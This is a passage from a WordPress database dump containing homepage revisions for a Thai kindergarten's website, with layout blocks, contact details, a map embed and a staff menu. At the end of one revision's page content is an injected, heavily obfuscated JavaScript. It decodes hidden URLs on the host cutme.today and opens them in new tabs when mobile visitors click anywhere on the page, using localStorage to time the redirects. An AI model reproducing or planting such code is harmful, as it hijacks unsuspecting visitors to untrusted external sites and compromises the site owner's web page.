orderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-26 15:56:05','2024-08-26 08:56:05','',19,'http://watprato.ssk.in.th/?p=213',0,'revision','',0),
(215,2,'2024-08-26 15:58:14','2024-08-26 08:58:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- 